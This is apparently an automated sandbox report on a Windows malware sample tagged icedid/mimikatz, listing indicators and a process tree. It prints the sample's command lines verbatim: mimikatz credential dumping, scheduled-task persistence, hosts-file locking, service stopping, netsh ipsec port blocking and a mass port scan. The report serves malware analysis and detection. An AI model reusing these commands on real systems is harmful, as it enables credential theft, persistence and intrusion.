\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-12-15_4661a4c89fbb89f34b2bc97f90f20a65_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language liuibviiz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mgmtcbi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mgmtcbi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1884 PING.EXE 1064 cmd.exe -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023cc4-6.dat nsis_installer_2 behavioral2/files/0x0007000000023cdb-15.dat nsis_installer_1 behavioral2/files/0x0007000000023cdb-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" mgmtcbi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ mgmtcbi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" mgmtcbi.exe Key created \REGISTRY\USER\.DEFAULT\Software iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" mgmtcbi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing mgmtcbi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" mgmtcbi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" mgmtcbi.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1884 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1896 schtasks.exe 4544 schtasks.exe 736 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 676 Process not Found 676 Process not Found 676 Process not Found 676 Process not Found 676 Process not Found 676 Process not Found 676 Process not Found 676 Process not Found 676 Process not Found 676 Process not Found 676 Process not Found 676 Process not Found 676 Process not Found 676 Process not Found 676 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 936 2024-12-15_4661a4c89fbb89f34b2bc97f90f20a65_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 936 2024-12-15_4661a4c89fbb89f34b2bc97f90f20a65_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3092 mgmtcbi.exe Token: SeDebugPrivilege 4984 mgmtcbi.exe Token: SeDebugPrivilege 224 vfshost.exe Token: SeDebugPrivilege 1128 iyibcmiuc.exe Token: SeLockMemoryPrivilege 4848 ltbtbc.exe Token: SeLockMemoryPrivilege 4848 ltbtbc.exe Token: SeDebugPrivilege 1228 iyibcmiuc.exe Token: SeDebugPrivilege 904 iyibcmiuc.exe Token: SeDebugPrivilege 1524 iyibcmiuc.exe Token: SeDebugPrivilege 3516 iyibcmiuc.exe Token: SeDebugPrivilege 1128 iyibcmiuc.exe Token: SeDebugPrivilege 3308 iyibcmiuc.exe Token: SeDebugPrivilege 216 iyibcmiuc.exe Token: SeDebugPrivilege 3160 iyibcmiuc.exe Token: SeDebugPrivilege 3708 iyibcmiuc.exe Token: SeDebugPrivilege 100 iyibcmiuc.exe Token: SeDebugPrivilege 876 iyibcmiuc.exe Token: SeDebugPrivilege 4740 iyibcmiuc.exe Token: SeDebugPrivilege 4204 iyibcmiuc.exe Token: SeDebugPrivilege 4364 iyibcmiuc.exe Token: SeDebugPrivilege 1832 iyibcmiuc.exe Token: SeDebugPrivilege 4792 iyibcmiuc.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 936 2024-12-15_4661a4c89fbb89f34b2bc97f90f20a65_hacktools_icedid_mimikatz.exe 936 2024-12-15_4661a4c89fbb89f34b2bc97f90f20a65_hacktools_icedid_mimikatz.exe 3092 mgmtcbi.exe 3092 mgmtcbi.exe 4984 mgmtcbi.exe 4984 mgmtcbi.exe 2416 xohudmc.exe 3524 qigmew.exe 3136 mgmtcbi.exe 3136 mgmtcbi.exe 5232 mgmtcbi.exe 5232 mgmtcbi.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 936 wrote to memory of 1064 936 2024-12-15_4661a4c89fbb89f34b2bc97f90f20a65_hacktools_icedid_mimikatz.exe 82 PID 936 wrote to memory of 1064 936 2024-12-15_4661a4c89fbb89f34b2bc97f90f20a65_hacktools_icedid_mimikatz.exe 82 PID 936 wrote to memory of 1064 936 2024-12-15_4661a4c89fbb89f34b2bc97f90f20a65_hacktools_icedid_mimikatz.exe 82 PID 1064 wrote to memory of 1884 1064 cmd.exe 84 PID 1064 wrote to memory of 1884 1064 cmd.exe 84 PID 1064 wrote to memory of 1884 1064 cmd.exe 84 PID 1064 wrote to memory of 3092 1064 cmd.exe 85 PID 1064 wrote to memory of 3092 1064 cmd.exe 85 PID 1064 wrote to memory of 3092 1064 cmd.exe 85 PID 4984 wrote to memory of 476 4984 mgmtcbi.exe 87 PID 4984 wrote to memory of 476 4984 mgmtcbi.exe 87 PID 4984 wrote to memory of 476 4984 mgmtcbi.exe 87 PID 476 wrote to memory of 2960 476 cmd.exe 89 PID 476 wrote to memory of 2960 476 cmd.exe 89 PID 476 wrote to memory of 2960 476 cmd.exe 89 PID 476 wrote to memory of 3964 476 cmd.exe 90 PID 476 wrote to memory of 3964 476 cmd.exe 90 PID 476 wrote to memory of 3964 476 cmd.exe 90 PID 476 wrote to memory of 1660 476 cmd.exe 91 PID 476 wrote to memory of 1660 476 cmd.exe 91 PID 476 wrote to memory of 1660 476 cmd.exe 91 PID 476 wrote to memory of 1840 476 cmd.exe 92 PID 476 wrote to memory of 1840 476 cmd.exe 92 PID 476 wrote to memory of 1840 476 cmd.exe 92 PID 476 wrote to memory of 2304 476 cmd.exe 93 PID 476 wrote to memory of 2304 476 cmd.exe 93 PID 476 wrote to memory of 2304 476 cmd.exe 93 PID 476 wrote to memory of 980 476 cmd.exe 94 PID 476 wrote to memory of 980 476 cmd.exe 94 PID 476 wrote to memory of 980 476 cmd.exe 94 PID 4984 wrote to memory of 2728 4984 mgmtcbi.exe 95 PID 4984 wrote to memory of 2728 4984 mgmtcbi.exe 95 PID 4984 wrote to memory of 2728 4984 mgmtcbi.exe 95 PID 4984 wrote to memory of 1256 4984 mgmtcbi.exe 97 PID 4984 wrote to memory of 1256 4984 mgmtcbi.exe 97 PID 4984 wrote to memory of 1256 4984 mgmtcbi.exe 97 PID 4984 wrote to memory of 224 4984 mgmtcbi.exe 99 PID 4984 wrote to memory of 224 4984 mgmtcbi.exe 99 PID 4984 wrote to memory of 224 4984 mgmtcbi.exe 99 PID 4984 wrote to memory of 1280 4984 mgmtcbi.exe 108 PID 4984 wrote to memory of 1280 4984 mgmtcbi.exe 108 PID 4984 wrote to memory of 1280 4984 mgmtcbi.exe 108 PID 1280 wrote to memory of 3684 1280 cmd.exe 110 PID 1280 wrote to memory of 3684 1280 cmd.exe 110 PID 1280 wrote to memory of 3684 1280 cmd.exe 110 PID 3684 wrote to memory of 4256 3684 wpcap.exe 111 PID 3684 wrote to memory of 4256 3684 wpcap.exe 111 PID 3684 wrote to memory of 4256 3684 wpcap.exe 111 PID 4256 wrote to memory of 4660 4256 net.exe 113 PID 4256 wrote to memory of 4660 4256 net.exe 113 PID 4256 wrote to memory of 4660 4256 net.exe 113 PID 3684 wrote to memory of 5100 3684 wpcap.exe 114 PID 3684 wrote to memory of 5100 3684 wpcap.exe 114 PID 3684 wrote to memory of 5100 3684 wpcap.exe 114 PID 5100 wrote to memory of 392 5100 net.exe 116 PID 5100 wrote to memory of 392 5100 net.exe 116 PID 5100 wrote to memory of 392 5100 net.exe 116 PID 3684 wrote to memory of 2212 3684 wpcap.exe 117 PID 3684 wrote to memory of 2212 3684 wpcap.exe 117 PID 3684 wrote to memory of 2212 3684 wpcap.exe 117 PID 2212 wrote to memory of 2256 2212 net.exe 119 PID 2212 wrote to memory of 2256 2212 net.exe 119 PID 2212 wrote to memory of 2256 2212 net.exe 119 PID 3684 wrote to memory of 2928 3684 wpcap.exe 120
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2164
-
C:\Windows\TEMP\untipbtiz\ltbtbc.exe"C:\Windows\TEMP\untipbtiz\ltbtbc.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\2024-12-15_4661a4c89fbb89f34b2bc97f90f20a65_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-12-15_4661a4c89fbb89f34b2bc97f90f20a65_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ybemumnz\mgmtcbi.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1884
-
-
C:\Windows\ybemumnz\mgmtcbi.exeC:\Windows\ybemumnz\mgmtcbi.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3092
-
-
-
C:\Windows\ybemumnz\mgmtcbi.exeC:\Windows\ybemumnz\mgmtcbi.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:476 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2960
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:3964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1660
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:1840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2304
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:980
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2728
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1256
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:224
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\jhetmctcv\bctzbzczb\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Windows\jhetmctcv\bctzbzczb\wpcap.exeC:\Windows\jhetmctcv\bctzbzczb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4660
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:392
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:2256
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2928
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:2148
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1524 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:432
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3516
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3596 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:3796 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3592
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\jhetmctcv\bctzbzczb\Scant.txt2⤵PID:936
-
C:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exeC:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\jhetmctcv\bctzbzczb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\jhetmctcv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\jhetmctcv\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4204 -
C:\Windows\jhetmctcv\Corporate\vfshost.exeC:\Windows\jhetmctcv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "jbemublie" /ru system /tr "cmd /c C:\Windows\ime\mgmtcbi.exe"2⤵PID:4160
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "jbemublie" /ru system /tr "cmd /c C:\Windows\ime\mgmtcbi.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "umbbbtict" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ybemumnz\mgmtcbi.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:1208 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:232
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "umbbbtict" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ybemumnz\mgmtcbi.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bwctviivv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\untipbtiz\ltbtbc.exe /p everyone:F"2⤵PID:4140
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4224
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bwctviivv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\untipbtiz\ltbtbc.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1896
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3320
-
-
